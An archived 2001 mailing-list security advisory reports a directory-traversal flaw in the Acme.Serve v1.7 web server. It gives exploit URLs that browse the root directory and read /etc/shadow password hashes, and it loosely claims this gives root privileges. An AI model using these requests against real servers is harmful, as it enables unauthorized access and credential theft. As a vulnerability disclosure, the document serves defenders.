Acme.Server v1.7 of 13nov96 Directory Browsing

From: Adnan Rahman (adnan.rahmanat_private)
Date: Thu May 31 2001 - 13:34:16 PDT

Next message: Microsoft Security Response Center: "RE: Yahoo/Hotmail scripting vulnerability, worm propagation"

Previous message: kj: "Re: TWIG SQL query bugs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

----------------------------------------------------------------------
Date: 31.05.2001
Affected Software: Acme.Serve v1.7 of 13nov96 (http://www.acme.com)
Exploit: Browsing of directories and files allowed to unauthorized users
Keywords: Cisco Secure Administration, Netscape FastTrack, ...
Contact: AS19 Team (infoat_private)
----------------------------------------------------------------------

Platforms: Sun + Unix

Details: Connect to http://potentialvictim:9090/// and you should have
access to the root dir of the machine running Acme.Serve 1.7.
http://potentialvictim:9090//etc/shadow and you can view the hash. You have
r00t privilegies.

Greetings, AS19 Team (http://www.as19.org)

Next message: Microsoft Security Response Center: "RE: Yahoo/Hotmail scripting vulnerability, worm propagation"
Previous message: kj: "Re: TWIG SQL query bugs"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jun 01 2001 - 13:37:29 PDT